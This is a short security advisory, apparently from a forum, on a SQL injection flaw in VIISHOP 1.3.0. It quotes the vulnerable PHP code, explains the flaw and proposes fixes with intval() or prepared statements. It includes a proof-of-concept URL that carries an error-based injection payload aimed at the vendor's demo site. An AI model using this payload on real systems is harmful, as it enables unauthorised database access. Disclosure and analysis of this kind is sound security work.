/*******************************************************/
/* VIISHOP 1.3.0 SQL Injection Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
/* Welcome to https://www.90sec.com */
/*******************************************************/

// index.php -- front controller (home page file).
// The lines below, up to the brand.php excerpt, are quoted from it.
$GLOBALS['_REQUEST'] = isset( $_REQUEST ) ? $_REQUEST : "";
define( "BASEDIR", dirname( __FILE__ ) );
include_once( BASEDIR."/config/db_config.php" );
include_once( BASEDIR."/include/common.inc.php" );
if ( !isset( $_REQUEST['p'] ) )
{
    $GLOBALS['_REQUEST']['p'] = "index";
}
// Request parameter `p` selects which file under system/ gets included.
// Two passes strip path separators / schemes and then everything outside
// [_a-zA-Z0-9], so the include target is limited to system/<word>.php
// (no directory traversal through this parameter).
// NOTE(review): eregi_replace() was deprecated in PHP 5.3 and removed in 7.0;
// on a current runtime this line is a fatal error.
$inc = str_replace( array( ":", "/", "..", ".", ";", "\\", "http", "ftp" ), "", $_REQUEST['p'] );
$inc = eregi_replace( "[^_a-zA-Z0-9]", "", $inc );
if ( !include( "system/{$inc}.php" ) )  // include happens after the filtering above; see the files under system/
{
    show_msg( "error_once", "index.php" );
}

// The problem is in brand.php (reached via p=brand).
// $prefix and $brand_id are never initialised in that file and are placed into
// the query without any filtering. $brand_id is interpolated straight into the
// SQL string literal, so a single quote in it terminates the literal and the
// remainder is executed as SQL -- that is the injection the PoC below exercises.
// NOTE(review): how $brand_id gets its value is not shown here; presumably
// common.inc.php imports request parameters into globals -- confirm.
// $prefix is the table prefix, presumably set in config/db_config.php -- confirm.
// Mitigation: never concatenate $brand_id into the statement -- bind it as a
// query parameter (prepared statement), or, if uid is a numeric column, cast it
// to int before it reaches the query.
$brand_list = $db->fetch_array( $db->query( "SELECT * FROM {$prefix}brand WHERE uid = '{$brand_id}'" ) );

// poc (as published; the URL is truncated by the forum):
// https://demo.viishop.com/index.ph ... 28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28select%20version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29

修复方案:


推荐80sec 的防注入代码 哈哈哈哈。更直接的修复是在 brand.php 中不要把 $brand_id 直接拼进 SQL 字符串：若 uid 为整数列就先用 intval() 转换，否则改用预处理语句并以参数绑定的方式传入。